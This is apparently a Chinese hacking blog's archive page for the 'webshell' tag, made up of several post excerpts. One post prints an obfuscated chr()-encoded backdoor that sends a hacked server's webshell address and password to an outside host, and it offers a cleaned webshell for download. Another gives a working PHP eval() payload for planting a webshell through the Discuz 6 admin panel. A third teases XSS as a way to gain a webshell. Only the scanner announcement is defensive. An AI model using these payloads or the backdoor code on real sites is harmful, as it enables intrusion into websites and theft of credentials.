存档

文章标签 ‘webshell’

Web杀毒v1.0 发布

2010年1月5日 4 条评论

   帮朋友发布一下,支持一下。

Safe3 WebShell Scanner是国内率先推出的一款绿色完全免费的web代码查杀软件,独创的智能扫描技术能有效扫描asp、php、jsp、aspx等多种WebShell,弥补了通常杀毒软件不能完全查杀WebShell的不足,给广大站长带来了福音.
阅读全文…

分类: 工具收集 标签: ,

十三少网马去后门

2008年9月18日 1 条评论

  今天那个salors要我丢他一个webshell,本来我这有好几个,准备给他13的,一看还有后门,这个东东俺以前没用过,他说要就帮他去一下后门,没有技术性,不过他Y的非要我写出来步骤,我就写一下吧。一会儿也将去后门的上传上来,供大家使用,如果下载后还有后门,告诉我一下,有时眼不好使。。。
  既然是后门,他一定会将url和pass保存下来,get到一个可以接收参数的页面去,所以,第一步要想的就是寻找user,pass。
  好了,我们现在寻找那段保存pass的代码,如图:

这段就是保存的pass变量,他接收时一定会用到这个变量,所以我们查找这个变量:
居然没找到!呵呵。一定还有另一段加密的代码,从上往下翻,到163行,有如下代码:

<br />copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(56)&chr(99)&chr(99)&chr(101)&chr(46)&chr(99)&chr(110)&chr(47)&chr(97)&chr(100)&chr(47)&chr(63)&chr(97)&chr(100)&chr(61)&chr(49)&chr(51)&chr(38)&chr(117)&chr(61)&serveru&chr(38)&chr(112)&chr(61)&serverp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10)

解密后就是:

然后我们将这个copyurl改成其他的,或者是搜索copyurl模块再个性,将其去掉。因为我这没带后门的马了。刚改过。

这样就把马去掉了。但是后来正准备给salors这个shell,但又发现一处,呵呵。。

搜索plgm,到312行,可以看到和copyurl一样的加密的,利用同样的方法,可以改掉了。。然后到plgm的执行模块,去掉相应的执行命令。这个地方主要是利用你挂马功能,将他的马也挂上了。。阴!!

就这样了。其他的不明白的,可以留言问。

记得以前在哪看过去十三少webshell的文章,但是忘记了,不过那种方法和这个加密不太一样,如果觉得我侵权了,说一下,不过为了学习技术嘛。。呵呵。

顺便把去后门的大马传上来!老的看着不爽。对CSS进行了修改。。呵呵

下载:down

分类: 网络安全 标签:

discuz6论坛后台建立WEBSHELL!

2008年1月22日 没有评论

来源:精灵's blog
昨天碰到一个DZ6.0的站,在群里问了下没人回答,又问了几个朋友也没人回答,也许牛人们都在忙吧,没时间理我,没办法自己研究吧,google了下,google到了两个方法.前提必须要有编辑权限.
一个是编辑actions.lang.php.试了一下行不通,貌似给过滤了.
另外一个是编辑customfaq.lang.php编辑这个文件,插入

&#039;,);?><?php eval($_POST&#91;badwolf&#93;);?><?php $lang = array(&#039;1

也不行.想了想,直接把这个文件给清空写入大马,竟然成功。后来没事情在自己的论坛上又研究了半天,又找到另一种方法,这里暂不公布

分类: 网络安全 标签: ,

跨出WEBSHELL—网域高科行业B2B商务平台实例

2008年1月22日 1 条评论

作者:樱花浪子
来源:http://www.hacklu.net
申明:本文已发表黑客手册,转载请注名版权,此文版权归樱花浪子和黑客手册所有. !
转载请注明!

  时间过的真快,记得在07年1月份我写过一篇关于跨站添加管理员的文章,上期又给大家带来一期跨站的文章,小天对我那句话比较赞同,跨站的威力是不比注入小的,注入如果遇见SQL数据库还好说,ACC的也就能老老实实猜密码,进后台,在利用后台某个功能得WEBSHELL……说了几句题外话,下面我们一起来跨出WEBSHELL,OK,LET'S GO。
阅读全文…

分类: 网络安全 标签: ,